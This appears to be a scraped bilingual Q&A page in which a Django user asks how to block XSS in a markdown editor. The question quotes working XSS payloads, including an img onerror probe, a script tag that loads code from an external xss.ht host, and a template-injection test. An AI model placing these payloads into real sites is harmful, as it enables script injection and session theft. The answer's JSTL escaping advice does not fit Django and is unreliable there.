[英]How to prevent XSS attacks with HTML/Javascript?
I want to know that how can I prevent script code and HTML attributes to stop from execution in editor of my website? 我想知道如何防止脚本代码和HTML属性在我的网站编辑器中停止执行?
If someone add script tags with external link of code or call a function of jQuery in some attribute of HTML tag. 如果有人使用外部代码链接添加脚本标签或在HTML标签的某些属性中调用jQuery函数。
I am using markdown editor and django framework. 我正在使用markdown编辑器和django框架。
For example: 例如:
'>"></title></style></textarea></script><img src=x onerror=alert(document.domain)></script>
'>"></title></style></textarea></script><script/src=https://samengmg.xss.ht></script>
{{7*7}}{7*7}
use htmlEscape="true" for all input fields. 对所有输入字段使用htmlEscape =“ true”。 If you are displaying a value, try fn:escapeXml(value).
如果要显示值,请尝试fn:escapeXml(value)。 You need to import jstl functions taglib
您需要导入jstl函数taglib
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.